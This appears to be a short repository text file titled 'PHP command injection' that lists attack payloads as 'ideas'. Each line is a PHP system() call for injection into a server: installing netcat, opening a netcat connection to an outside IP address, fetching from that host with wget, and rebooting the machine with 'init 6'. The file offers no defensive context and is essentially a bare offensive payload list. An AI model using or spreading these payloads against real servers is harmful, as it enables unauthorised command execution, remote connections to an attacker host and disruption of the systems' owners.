CryptoZSH/tools/v3das/web_injection_php.txt

12 lines
226 B
Plaintext
Executable File

PHP command injection
=====================
There are just some ideas.
<? system('apt-get install netcat -y'); ?>
<? system('netcat 14.5.1.44 8080'); ?>
<? system('wget http://14.5.1.44:8080/'); ?>
<? system('init 6'); ?>